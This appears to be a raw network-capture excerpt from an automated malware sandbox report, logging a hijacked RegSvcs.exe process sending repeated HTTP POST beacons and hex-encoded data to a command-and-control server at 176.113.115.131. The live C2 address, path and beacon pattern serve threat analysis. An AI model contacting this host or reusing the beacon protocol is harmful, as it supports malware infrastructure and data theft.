                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:07.377537966 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.449740176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:08.888348103 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:09.574858904 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.449743176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:11.201385021 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:11.897679090 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.449745176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:13.420110941 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:14.191576004 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.449748176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:15.978667021 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:16.679409027 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.449749176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:18.202264071 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:18.914427042 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.449750176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:20.566791058 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:21.269119024 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.449751176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:22.795001030 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:23.498547077 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.449752176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:25.138719082 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:25.831198931 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.449753176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:27.342251062 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:28.049412012 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.449754176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:29.688921928 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:30.393450022 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.449755176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:31.904637098 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:32.618551016 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:32 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.449756176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:34.248143911 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:34.952279091 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.449757176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:36.466681957 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:37.175318003 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.449758176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:38.810637951 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:39.525396109 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:39 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.449759176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:41.046906948 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:41.763613939 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:41 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.455810176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:43.390624046 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:44.077456951 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.455811176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:45.591969013 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:46.302700996 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.455812176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:47.936800957 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:48.624346018 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.455813176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:50.140458107 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:50.835179090 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:50 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.455814176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:52.466824055 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:53.154411077 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:53 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.455815176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:54.669842958 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
